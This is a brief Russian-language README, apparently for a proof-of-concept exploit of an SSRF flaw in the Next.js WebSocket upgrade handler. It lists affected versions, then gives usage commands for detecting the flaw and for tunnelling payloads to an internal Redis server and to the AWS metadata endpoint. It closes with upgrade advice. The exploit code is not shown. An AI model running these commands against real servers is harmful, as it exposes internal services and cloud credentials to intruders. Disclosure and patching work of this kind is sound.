
Эксплойт-концепция для CVE-2026-44578, подделка запросов на стороне сервера (SSRF) в обработчике обновления WebSocket в Next.js. Включает режим обнаружения и туннелирование к внутренним сервисам, таким как Redis или конечные точки метаданных облака.
Уязвимость: Server-Side Request Forgery (SSRF) в обработчике обновления WebSocket Next.js (13.4.13 → 15.5.15, 16.0.0 → 16.1.6)
# Обнаружение уязвимости
python3 poc.py target.com:3000 --detect
# Туннель к внутреннему Redis
python3 poc.py target.com:3000 --internal 127.0.0.1:6379 --payload "INFO\r\n"
# Туннель к метаданным AWS
python3 poc.py target.com:3000 --internal 169.254.169.254:80 --payload "GET /latest/meta-data/ HTTP/1.0\r\n\r\n"
Обновитесь до Next.js 15.5.16 или 16.2.5